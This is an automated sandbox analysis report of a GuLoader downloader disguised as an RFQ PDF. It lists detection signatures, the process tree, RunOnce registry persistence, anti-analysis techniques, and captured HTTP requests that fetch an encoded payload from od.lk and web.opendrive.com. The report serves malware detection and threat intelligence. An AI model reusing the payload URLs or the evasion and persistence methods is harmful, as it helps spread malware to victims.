Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_SRC02252017-pdf.scr.exe

Overview

General Information

Sample name:RFQ_SRC02252017-pdf.scr.exe
Analysis ID:1617166
MD5:11f41ca243c031d073ca13d1aa0e9a29
SHA1:ba4eb2a551a053f3f222ce0c5039e5b05cca880e
SHA256:7a0f824a21b8f5d26bf8536e2f5958514b6975d54722418719c8e919734a3986
Tags:exeuser-threatcat_ch
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Increases the number of concurrent connection per server for Internet Explorer
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ_SRC02252017-pdf.scr.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
    • RFQ_SRC02252017-pdf.scr.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
      • WerFault.exe (PID: 8028 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • microminiaturise.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
    • microminiaturise.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" MD5: 11F41CA243C031D073CA13D1AA0E9A29)
      • WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2096 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2846924504.0000000005E9B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2172873963.0000000005E9B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: RFQ_SRC02252017-pdf.scr.exe PID: 7308JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: New RUN Key Pointing to Suspicious Folder
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Befolkningsgruppe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Befolkningsgruppe
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 10, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe, ProcessId: 7724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-17T15:50:59.989171+010028032702Potentially Bad Traffic192.168.2.44975938.108.185.115443TCP
        2025-02-17T15:52:05.495068+010028032702Potentially Bad Traffic192.168.2.45001338.108.185.115443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeReversingLabs: Detection: 27%
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeVirustotal: Detection: 37%Perma Link
        Multi AV Scanner detection for submitted file
        Source: RFQ_SRC02252017-pdf.scr.exeReversingLabs: Detection: 27%
        Source: RFQ_SRC02252017-pdf.scr.exeVirustotal: Detection: 37%Perma Link
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: RFQ_SRC02252017-pdf.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:50013 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:50014 version: TLS 1.2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_00402645 FindFirstFileA,4_2_00402645
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_00405FE2 FindFirstFileA,FindClose,4_2_00405FE2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559E
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: Joe Sandbox ViewIP Address: 38.108.185.115 38.108.185.115
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49759 -> 38.108.185.115:443
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50013 -> 38.108.185.115:443
        Source: global trafficHTTP traffic detected: GET /d/MzdfMzIyNjM2NDFf/DgaYM84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/MzdfMzIyNjM2NDFf/DgaYM84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /d/MzdfMzIyNjM2NDFf/DgaYM84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/MzdfMzIyNjM2NDFf/DgaYM84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: od.lkCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&inline=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: web.opendrive.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: od.lk
        Source: global trafficDNS traffic detected: DNS query: web.opendrive.com
        Source: RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: RFQ_SRC02252017-pdf.scr.exe, microminiaturise.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.00000000037C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/J~Z_
        Source: microminiaturise.exe, 0000000A.00000002.3338788769.0000000003668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIyNjM2NDFf/DgaYM84.bin
        Source: microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/z
        Source: microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/
        Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/4
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2316123890.0000000003833000.00000004.00000020.00020000.00000000.sdmp, RFQ_SRC02252017-pdf.scr.exe, 00000004.00000002.2816590393.0000000003833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/E
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/LMEM
        Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994509172.0000000003701000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000003.2994620111.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, microminiaturise.exe, 0000000A.00000002.3338788769.00000000036B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0E%06%983%CE%1B%8A&in
        Source: microminiaturise.exe, 0000000A.00000002.3338788769.00000000036A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/MzdfMzIyNjM2NDFf?temp_key=%0~
        Source: microminiaturise.exe, 0000000A.00000003.2959967361.0000000003701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/aut
        Source: RFQ_SRC02252017-pdf.scr.exe, 00000004.00000003.2304965874.0000000003838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/u
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:50013 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 38.108.185.71:443 -> 192.168.2.4:50014 version: TLS 1.2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405107

        System Summary

        barindex
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: RFQ_SRC02252017-pdf.scr.exe
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403217
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_004049460_2_00404946
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_004062B80_2_004062B8
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_004049464_2_00404946
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 4_2_004062B84_2_004062B8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsl4A68.tmp\System.dll 75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: String function: 004029FD appears 49 times
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076
        Source: RFQ_SRC02252017-pdf.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal96.phis.troj.evad.winEXE@8/26@3/2
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440A
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Program Files (x86)\Redwing.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\kendingsmelodiernesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeMutant created: NULL
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4464
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7724
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsu46FA.tmpJump to behavior
        Source: RFQ_SRC02252017-pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: RFQ_SRC02252017-pdf.scr.exeReversingLabs: Detection: 27%
        Source: RFQ_SRC02252017-pdf.scr.exeVirustotal: Detection: 37%
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeFile read: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 2076
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe"
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe"
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2096
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeProcess created: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe "C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exeProcess created: C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe "C:\Users\user\AppData\Local\Temp\Eksponentialfunktionen\microminiaturise.exe" Jump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\RFQ_SRC02252017-pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
